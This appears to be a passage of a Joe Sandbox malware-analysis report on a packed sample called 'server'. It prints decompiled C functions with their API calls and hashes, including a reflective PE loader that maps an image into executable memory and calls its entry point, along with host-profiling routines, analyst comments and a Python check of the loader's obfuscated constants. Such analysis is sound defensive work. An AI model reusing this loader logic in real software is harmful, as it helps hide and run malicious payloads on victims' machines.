                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: ExitThreadlstrlen
                      • String ID:
                      • API String ID: 2636182767-0
                      • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                      • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                      • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                      • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 02BD32AB
                        • Part of subcall function 02BD790B: SysFreeString.OLEAUT32(?), ref: 02BD79EA
                      • SafeArrayDestroy.OLEAUT32(?), ref: 02BD32FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: ArraySafe$CreateDestroyFreeString
                      • String ID:
                      • API String ID: 3098518882-0
                      • Opcode ID: b0e1afe280b7578213556f9bbb3bc05b1e2c1af8226f31b6c41ae0c9f4f28401
                      • Instruction ID: e6c51f089565e67eb9433e5d4cb8f857fe94f993f18b8f5e877e15a357e18842
                      • Opcode Fuzzy Hash: b0e1afe280b7578213556f9bbb3bc05b1e2c1af8226f31b6c41ae0c9f4f28401
                      • Instruction Fuzzy Hash: AC117C3290010ABFDB019FA8CC04AEEBBB9EF08750F018065EA04E7160F7719A259FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02199AA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: VirtualAlloc
                      • API String ID: 4275171209-164498762
                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                      • Instruction ID: 0b2d6d64375ce67704a1a65b14e17fc5eb3fa96028d9bc7ec314ff1e7746c143
                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                      • Instruction Fuzzy Hash: 16113DB0D08289EEEF01DBE88409BEEBFB55B11705F044098D5446A282D7BA5758CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                      				void* _t21;
                      				void* _t22;
                      				signed int _t24;
                      				intOrPtr* _t26;
                      				void* _t27;
                      
                      				_t26 = __edi;
                      				if(_a4 == 0) {
                      					L2:
                      					_t27 = E02BD58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                      					if(_t27 == 0) {
                      						_t24 = _a12 >> 1;
                      						if(_t24 == 0) {
                      							_t27 = 2;
                      							HeapFree( *0x2bda2d8, 0, _a4);
                      						} else {
                      							_t21 = _a4;
                      							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                      							 *_t26 = _t21;
                      						}
                      					}
                      					L6:
                      					return _t27;
                      				}
                      				_t22 = E02BD2839(_a4, _a8, _a12, __edi); // executed
                      				_t27 = _t22;
                      				if(_t27 == 0) {
                      					goto L6;
                      				}
                      				goto L2;
                      			}

                      0x02bd33f1
                      0x02bd33f9
                      0x02bd3410
                      0x02bd342b
                      0x02bd342f
                      0x02bd3434
                      0x02bd3436
                      0x02bd3448
                      0x02bd3454
                      0x02bd3438
                      0x02bd3438
                      0x02bd343d
                      0x02bd3442
                      0x02bd3442
                      0x02bd3436
                      0x02bd345a
                      0x02bd345e
                      0x02bd345e
                      0x02bd3405
                      0x02bd340a
                      0x02bd340e
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                        • Part of subcall function 02BD2839: SysFreeString.OLEAUT32(00000000), ref: 02BD289C
                      • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,02BD528E,?,004F0053,035B9218,00000000,?), ref: 02BD3454
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Free$HeapString
                      • String ID: Uqt
                      • API String ID: 3806048269-2320327147
                      • Opcode ID: b891fe00d4993aea896d056f7548f2b095a799524e89b2606355a5fbd1c5e2a7
                      • Instruction ID: b4f19556ad4cce7a2276902b59b1fc20c0f06be3dd9038addc246ddd3a71e1e4
                      • Opcode Fuzzy Hash: b891fe00d4993aea896d056f7548f2b095a799524e89b2606355a5fbd1c5e2a7
                      • Instruction Fuzzy Hash: 4A014B32901619BBCB239F54CC01FEA3FA5EF04790F4884A4FE099A161E731E960DF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E02BD472F(void* __ecx) {
                      				signed int _v8;
                      				void* _t15;
                      				void* _t19;
                      				void* _t20;
                      				void* _t22;
                      				intOrPtr* _t23;
                      
                      				_t23 = __imp__;
                      				_t20 = 0;
                      				_v8 = _v8 & 0;
                      				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                      				_t10 = _v8;
                      				if(_v8 != 0) {
                      					_t20 = E02BD33DC(_t10 + 1);
                      					if(_t20 != 0) {
                      						_t15 =  *_t23(3, _t20,  &_v8); // executed
                      						if(_t15 != 0) {
                      							 *((char*)(_v8 + _t20)) = 0;
                      						} else {
                      							E02BD61DA(_t20);
                      							_t20 = 0;
                      						}
                      					}
                      				}
                      				return _t20;
                      			}

                      0x02bd4734
                      0x02bd473f
                      0x02bd4741
                      0x02bd4747
                      0x02bd4749
                      0x02bd474e
                      0x02bd4757
                      0x02bd475b
                      0x02bd4764
                      0x02bd4768
                      0x02bd4777
                      0x02bd476a
                      0x02bd476b
                      0x02bd4770
                      0x02bd4770
                      0x02bd4768
                      0x02bd475b
                      0x02bd4780

                      APIs
                      • GetComputerNameExA.KERNEL32(00000003,00000000,02BD3DCD,00000000,00000000,?,775EC740,02BD3DCD), ref: 02BD4747
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • GetComputerNameExA.KERNEL32(00000003,00000000,02BD3DCD,02BD3DCE,?,775EC740,02BD3DCD), ref: 02BD4764
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: ComputerHeapName$AllocateFree
                      • String ID:
                      • API String ID: 187446995-0
                      • Opcode ID: ea80e3b5a68ff7918e29b1bfa002b975b9010f3fa55efa759b125b283a2ae5b1
                      • Instruction ID: c93cabf1bcd5a1c28f5344c9354820ebafb5c0a8e2a37d936086ed025b247517
                      • Opcode Fuzzy Hash: ea80e3b5a68ff7918e29b1bfa002b975b9010f3fa55efa759b125b283a2ae5b1
                      • Instruction Fuzzy Hash: F9F05E36A0011AFBEB11D6AA9D40EEF77FDDBC6658F5100A9A904D3140FF70DE028A70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD5006(signed int __edx, intOrPtr _a4) {
                      				void* _t3;
                      				void* _t5;
                      				void* _t7;
                      				void* _t8;
                      				void* _t9;
                      				signed int _t10;
                      
                      				_t10 = __edx;
                      				_t3 = HeapCreate(0, 0x400000, 0); // executed
                      				 *0x2bda2d8 = _t3;
                      				if(_t3 == 0) {
                      					_t8 = 8;
                      					return _t8;
                      				}
                      				 *0x2bda1c8 = GetTickCount();
                      				_t5 = E02BD54D8(_a4);
                      				if(_t5 == 0) {
                      					_t5 = E02BD213E(_t9, _a4); // executed
                      					if(_t5 == 0) {
                      						if(E02BD6392(_t9) != 0) {
                      							 *0x2bda300 = 1; // executed
                      						}
                      						_t7 = E02BD2523(_t10); // executed
                      						return _t7;
                      					}
                      				}
                      				return _t5;
                      			}

                      0x02bd5006
                      0x02bd500f
                      0x02bd5015
                      0x02bd501c
                      0x02bd5020
                      0x00000000
                      0x02bd5020
                      0x02bd502d
                      0x02bd5032
                      0x02bd5039
                      0x02bd503f
                      0x02bd5046
                      0x02bd504f
                      0x02bd5051
                      0x02bd5051
                      0x02bd505b
                      0x00000000
                      0x02bd505b
                      0x02bd5046
                      0x02bd5060

                      APIs
                      • HeapCreate.KERNEL32(00000000,00400000,00000000,02BD107E,?), ref: 02BD500F
                      • GetTickCount.KERNEL32 ref: 02BD5023
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: CountCreateHeapTick
                      • String ID:
                      • API String ID: 2177101570-0
                      • Opcode ID: beeb4259e49a263fc9b639c02cc708880092f9c727da8fd66493987283ab0b60
                      • Instruction ID: 33e3b880d3475da14aa92c3bdda82614f51983a7f7a227ead7dec99e4da25d01
                      • Opcode Fuzzy Hash: beeb4259e49a263fc9b639c02cc708880092f9c727da8fd66493987283ab0b60
                      • Instruction Fuzzy Hash: 75F09230AC0701ABEB722B71AC347D53695EF04785FD4C8A5E905E6081FB71D4609F65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 34%
                      			E02BD2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v12;
                      				void* _v18;
                      				char _v20;
                      				intOrPtr _t15;
                      				void* _t17;
                      				intOrPtr _t19;
                      				void* _t23;
                      
                      				_v20 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosw");
                      				_t15 =  *0x2bda348; // 0x9dd5a8
                      				_t4 = _t15 + 0x2bdb3e8; // 0x35b8990
                      				_t20 = _t4;
                      				_t6 = _t15 + 0x2bdb174; // 0x650047
                      				_t17 = E02BD790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                      				if(_t17 < 0) {
                      					_t23 = _t17;
                      				} else {
                      					_t23 = 8;
                      					if(_v20 != _t23) {
                      						_t23 = 1;
                      					} else {
                      						_t19 = E02BD661C(_t20, _v12);
                      						if(_t19 != 0) {
                      							 *_a16 = _t19;
                      							_t23 = 0;
                      						}
                      						__imp__#6(_v12);
                      					}
                      				}
                      				return _t23;
                      			}

                      0x02bd2843
                      0x02bd284a
                      0x02bd284b
                      0x02bd284c
                      0x02bd284d
                      0x02bd2853
                      0x02bd2858
                      0x02bd2858
                      0x02bd2862
                      0x02bd2874
                      0x02bd287b
                      0x02bd28a9
                      0x02bd287d
                      0x02bd287f
                      0x02bd2884
                      0x02bd28a6
                      0x02bd2886
                      0x02bd2889
                      0x02bd2890
                      0x02bd2895
                      0x02bd2897
                      0x02bd2897
                      0x02bd289c
                      0x02bd289c
                      0x02bd2884
                      0x02bd28b0

                      APIs
                        • Part of subcall function 02BD790B: SysFreeString.OLEAUT32(?), ref: 02BD79EA
                        • Part of subcall function 02BD661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BD4B72,004F0053,00000000,?), ref: 02BD6625
                        • Part of subcall function 02BD661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BD4B72,004F0053,00000000,?), ref: 02BD664F
                        • Part of subcall function 02BD661C: memset.NTDLL ref: 02BD6663
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD289C
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeString$lstrlenmemcpymemset
                      • String ID:
                      • API String ID: 397948122-0
                      • Opcode ID: 04f09a952d33c4aec73cd43d01b5b8a4641cd5720f571a9b89bfabccf7e802dc
                      • Instruction ID: ee14ba5ee09eedb976150e46267c718c367fd5b75798b418ff7dc0b8c88b743d
                      • Opcode Fuzzy Hash: 04f09a952d33c4aec73cd43d01b5b8a4641cd5720f571a9b89bfabccf7e802dc
                      • Instruction Fuzzy Hash: CA017C32940119BFEB119FA8DC44AEABBB9FF04754F0146A5EE01E7061F772A961CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E00401D3C(void* __eax, intOrPtr _a4) {
                      
                      				 *0x404190 =  *0x404190 & 0x00000000;
                      				_push(0);
                      				_push(0x40418c);
                      				_push(1);
                      				_push(_a4);
                      				 *0x404188 = 0xc; // executed
                      				L00401682(); // executed
                      				return __eax;
                      			}

                      0x00401d3c
                      0x00401d43
                      0x00401d45
                      0x00401d4a
                      0x00401d4c
                      0x00401d50
                      0x00401d5a
                      0x00401d5f

                      APIs
                      • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: DescriptorSecurity$ConvertString
                      • String ID:
                      • API String ID: 3907675253-0
                      • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                      • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                      • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                      • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004012E6(long _a4) {
                      				void* _t2;
                      
                      				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
                      				return _t2;
                      			}

                      0x004012f2
                      0x004012f8

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                      • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                      • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                      • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401BA9(void* _a4) {
                      				char _t2;
                      
                      				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
                      				return _t2;
                      			}

                      0x00401bb5
                      0x00401bbb

                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                      • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                      • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                      • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E004012FB(void* __eax) {
                      				char _v8;
                      				void* _v12;
                      				void* __edi;
                      				void* _t18;
                      				long _t26;
                      				long _t29;
                      				intOrPtr _t40;
                      				void* _t41;
                      				void* _t42;
                      				void* _t44;
                      
                      				_t41 = __eax; // raw (unmapped) PE image to be loaded
                      				_t16 =  *0x404180; // per-sample constant; the loader derives its working values from it
                      				// OptionalHeader.SizeOfImage (e_lfanew at +0x3c, SizeOfImage at NT+0x50) rounded up:
                      				// (size + mask) & ~mask with mask = *0x404180 - 0x43174ac4 ('!' in this output is bitwise NOT)
                      				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                      				// E00401202 (GetModuleHandleA + 5x GetProcAddress) obtains the target region: _v8 receives its base,
                      				// _v12 a context released at the end. Third argument: *0x404180 + 0xbce8a57d, which is
                      				// 0x40 (PAGE_EXECUTE_READWRITE) if *0x404180 holds 0x43175ac3 as 0x2bda344 does in the unpacked module below
                      				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                      				if(_t18 != 0) {
                      					_t29 = 8; // ERROR_NOT_ENOUGH_MEMORY
                      					goto L8;
                      				} else {
                      					_t40 = _v8; // base of the new region
                      					_t29 = E00401BC4(_t33, _t40, _t41); // no APIs listed: presumably copies headers and sections from _t41 into _t40
                      					if(_t29 == 0) {
                      						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; // IMAGE_NT_HEADERS of the mapped copy
                      						_t29 = E00401000(_t40, _t44); // resolves imports (LoadLibraryA is called from this subcall)
                      						if(_t29 == 0) {
                      							_t26 = E004014CF(_t44, _t40); // executed; applies per-section protections (VirtualProtect)
                      							_t29 = _t26;
                      							if(_t29 == 0) {
                      								// call base + OptionalHeader.AddressOfEntryPoint (NT+0x28) with (base, 1, 0),
                      								// i.e. DllMain(hModule, DLL_PROCESS_ATTACH, NULL); _t26 is 0 at this point
                      								_push(_t26);
                      								_push(1);
                      								_push(_t40);
                      								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                      									_t29 = GetLastError(); // FALSE from the entry point is treated as failure
                      								}
                      							}
                      						}
                      					}
                      					_t42 = _v12;
                      					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42)); // teardown through two function pointers in the E00401202 context
                      					E00401BA9(_t42);
                      					L8:
                      					return _t29; // 0 on success, otherwise a Win32 error code
                      				}
                      			}

                      Statement addresses (one per decompiled statement, in order; side column collapsed):
                      0x00401303 0x00401305 0x00401321 0x00401332 0x00401339 0x00401397 0x00000000 0x0040133b
                      0x0040133b 0x00401345 0x00401349 0x0040134e 0x00401356 0x0040135a 0x0040135f 0x00401364
                      0x00401368 0x0040136d 0x0040136e 0x00401372 0x00401377 0x0040137f 0x0040137f 0x00401377
                      0x00401368 0x0040135a 0x00401381 0x0040138a 0x0040138e 0x00401398 0x0040139e 0x0040139e

                      APIs
                        • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                        • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                        • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                        • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                        • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                        • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                        • Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                        • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                        • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                        • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                      • GetLastError.KERNEL32(?,?), ref: 00401379
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                      • String ID:
                      • API String ID: 3135819546-0
                      • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                      • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                      • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                      • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                      Uniqueness

                      Uniqueness Score: -1.00%
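The loader E004012FB reaches into the PE header by raw offset and hides the values it needs behind the per-sample constant at 0x404180. The Python below is an added check, not part of the Joe Sandbox report or of the sample's code: it reproduces the three computations on a constructed minimal PE32 header so the offsets can be confirmed (0x3c = e_lfanew, NT+0x28 = AddressOfEntryPoint, NT+0x50 = SizeOfImage, the latter two valid for PE32 only). It assumes that *0x404180 holds 0x43175ac3, the value the report prints for 0x2bda344 in the unpacked module further down; under that assumption the size expression reduces to page rounding, (size + 0xFFF) & ~0xFFF, and the third E00401202 argument, *0x404180 + 0xbce8a57d mod 2^32, comes out as 0x40, which is PAGE_EXECUTE_READWRITE. The header bytes and the key value are constructed/assumed inputs.

```python
import struct

# Assumption: *0x404180 holds the same per-sample value that the unpacked
# module stores at 0x2bda344 (shown as 0x43175ac3 in E02BD1D8A below).
LOADER_KEY = 0x43175AC3
MASK32 = 0xFFFFFFFF


def deobfuscate_add(key, addend):
    """Recover a constant hidden as (key + addend) mod 2**32, the form of the
    third argument in E00401202(..., *0x404180 + 0xbce8a57d, ...)."""
    return (key + addend) & MASK32


def round_up_like_loader(size, key, sub=0x43174AC4):
    """Reproduce (size + (key - sub)) & ~(key - sub) from E004012FB.
    With key == 0x43175ac3 the mask is 0xFFF, i.e. rounding up to a 4 KiB page."""
    k = (key - sub) & MASK32
    return (size + k) & (~k & MASK32)


def loader_header_fields(image):
    """Read the three PE header fields E004012FB dereferences by raw offset:
    e_lfanew (image+0x3c), AddressOfEntryPoint (nt+0x28), SizeOfImage (nt+0x50).
    The sample never validates signatures; this check does, and rejects PE32+
    because the two NT-relative offsets differ there."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    magic = struct.unpack_from("<H", image, e_lfanew + 0x18)[0]
    if magic != 0x10B:
        raise ValueError("not a PE32 image")
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 0x28)[0]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + 0x50)[0]
    return e_lfanew, entry_rva, size_of_image


def build_min_pe32(entry_rva=0x1000, size_of_image=0x5234, e_lfanew=0x80):
    """Constructed minimal PE32 header (not taken from the sample) for exercising
    loader_header_fields; only the fields the loader touches are populated."""
    image = bytearray(e_lfanew + 0xF8)  # NT headers = 0x18 + 224-byte PE32 optional header
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", image, e_lfanew + 4, 0x14C)     # FileHeader.Machine = i386
    struct.pack_into("<H", image, e_lfanew + 0x14, 0xE0)   # SizeOfOptionalHeader
    struct.pack_into("<H", image, e_lfanew + 0x18, 0x10B)  # OptionalHeader.Magic = PE32
    struct.pack_into("<I", image, e_lfanew + 0x28, entry_rva)
    struct.pack_into("<I", image, e_lfanew + 0x50, size_of_image)
    return bytes(image)
```

If the real value at 0x404180 turns out to differ, replace LOADER_KEY; the two derived results (a mask of the form 2^n - 1 and a valid PAGE_* constant) are the sanity check that the guessed key is right.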

                      C-Code - Quality: 75%
                      			E02BD5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
                      				void* _t13;
                      				void* _t21;
                      
                      				_t11 =  &_a4;
                      				_t21 = 0; // result buffer, 0 on failure
                      				__imp__( &_a8); // lstrlen (ref 02BD5074); the decompiler lost the argument binding
                      				// E02BD1508: CryptAcquireContextW(PROV_RSA_AES = 0x18, CRYPT_VERIFYCONTEXT = 0xF0000000),
